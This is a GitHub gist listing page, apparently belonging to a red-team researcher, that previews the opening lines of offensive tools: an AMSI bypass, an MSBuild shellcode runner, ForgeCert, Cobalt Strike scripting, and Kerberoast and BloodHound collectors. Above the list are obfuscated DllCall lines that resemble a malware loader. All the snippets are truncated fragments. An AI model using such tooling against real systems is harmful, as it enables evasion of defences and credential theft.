Skip to content

Instantly share code, notes, and snippets.

View gist:4b97f353f58d96e925c63b3909cbe8bd
Line 588: $arSmtpEight = DllCall("kernel32.dll", "ptr", "VirtualAllocExNuma","handle", $REGULARLYDESCRIBEEDSPRIESTAPT,"ptr", $BeverageIncorporatedBookmarkEstablished,"dword_ptr", $RPCLAIREDEVELOPERPENDINGKILLER,"dword", 0x1000,"dword", 4, "dword", 0)
Line 615: $arSmtpEight = DllCall("kernel32.dll", "ptr", "VirtualAllocExNuma","handle", $REGULARLYDESCRIBEEDSPRIESTAPT,"ptr", $BeverageIncorporatedBookmarkEstablished,"dword_ptr", $RPCLAIREDEVELOPERPENDINGKILLER,"dword", 0x3000,"dword", 4, "dword", 0)
Line 776: $SOMANONPROFITPD = DllCall("shlwapi.dll", "bool", "PathIsDirectoryW", "wstr", "YAg")
Line 825: $ManufacturedVillagesBeadsOvercome = DllCall("kernel32.dll", "long", "GetErrorMode")
Line 921: $bbswantingaka = DllCall("shlwapi.dll", "bool", "PathIsDirectoryW", "wstr", "lScKbjVnlu")
Line 1370: $ledandorradecadesevanescence = DllCall("kernel32.dll","dword","GetActiveProcessorCount", "dword", 159)
Line 1451: $namespacepvcadjustmentbaskets = DllCall("kernel32.dll","dword","GetActiveProcessorCount
CCob / Program.cs
Created September 8, 2022 13:05
ForgeCert + Smartcard Logon EKU
View Program.cs
using Org.BouncyCastle.Asn1.Pkcs;
using Org.BouncyCastle.Asn1.X509;
using Org.BouncyCastle.Asn1.X9;
using Org.BouncyCastle.Crypto;
using Org.BouncyCastle.Crypto.Generators;
using Org.BouncyCastle.Crypto.Operators;
using Org.BouncyCastle.Crypto.Parameters;
using Org.BouncyCastle.Math;
using Org.BouncyCastle.Security;
using Org.BouncyCastle.X509;
CCob / patchless_amsi.h
Created April 17, 2022 16:18
In-Process Patchless AMSI Bypass
View patchless_amsi.h
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
CCob / execute_x64_shellcode.xml
Last active May 19, 2021 06:14
Execute x64 Shellcode
View execute_x64_shellcode.xml
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes x64 shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
CCob / rc4.cna
Created January 28, 2021 20:09
Aggressor Script for RC4 encryption
View rc4.cna
#RC4 encryption implementation using Java Crypto API
#Author: @_EthicalChaos_
import javax.crypto.spec.*;
import javax.crypto.*;
# $1 = plaintext, $2 = key
sub encryptRC4{
CCob / x86_relative_shellcode_strings.c
Last active July 9, 2023 10:49
x86 Relative String Addressing Hack
View x86_relative_shellcode_strings.c
#include <stdio.h>
#ifdef _WIN64
#define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x48\x83\xc0\x06\xc3" str;
#elif _WIN32
#define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x83\xc0\x05\xc3" str;
CCob / IBH.txt
Created April 21, 2020 10:57
View IBH.txt
This file has been truncated, but you can view the full file.
function Invoke-BH{
$CollectionMethod = [string[]] @('Default'),
CCob / IKR.txt
Created April 21, 2020 10:22
View IKR.txt
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
Note: the primary method of use will be Invoke-Kerberoast with
various targeting options.